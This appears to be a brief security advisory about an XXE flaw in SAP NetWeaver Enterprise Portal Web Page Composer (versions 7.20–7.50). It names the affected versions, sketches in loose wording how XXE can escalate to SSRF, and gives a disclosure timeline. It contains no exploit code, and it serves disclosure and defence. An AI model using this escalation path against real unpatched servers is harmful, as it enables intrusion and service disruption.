Preface: An XML External Entity (XXE) attack is a type of attack against an application that parses XML input. Furthermore, SSRF is an attack in which an attacker can force a vulnerable server to trigger malicious requests to third-party servers and or to internal resources.
Background: SAP Enterprise Portal is the Web front-end component for SAP NetWeaver – the comprehensive integration and application platform that facilitates the alignment of people, information, and business processes across organizational and technical boundaries.
Enterprise Portal (EP) provides users with a single, uniform point of access to the applications, services, and information they need for their daily work. Moreover, the Portal offers business users the features to easily create and manage portal pages and generate their own content using the following capabilities:
● KM and Web Content Capabilities
EP provides basic document management capabilities and content services within SAP Enterprise Portal (KM). KM provides the basic capabilities that customers need to run their scenarios, as well as an extension framework for custom implementations.
These KM capabilities are also integrated into the Web Page Composer environment to enable flexible Web content management scenarios, bringing relevant information from user-generated content and business
applications together in the portal.
Vulnerability details: Missing XML Validation vulnerability in SAP NW EP WPC. Product – SAP NetWeaver (EP Web Page Composer), Versions – 7.20, 7.30, 7.31, 7.40, 7.50.
Some part of SAP NetWeaver (EP Web Page Composer) does not sufficiently validate an XML document accepted from an untrusted source, which allows an adversary to exploit unprotected XML parking at endpoints, and a possibility to conduct SSRF attacks that could compromise system’s Availability by causing system to crash.
One of the possibilities: This is an example of an insider threat – In order to utilize SSRF through the escalation of the XXE, the XML entity must be identified by the URL attacker want to locate and use the data value that defines the entity. By using the given entity in the data value, i.e. returned in the application’s response. Then we can view the response from the URL in the application response.
Official announcement: https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html
Timeline:
03/30/2022 CVE reserved
06/13/2022 +75 days Advisory disclosed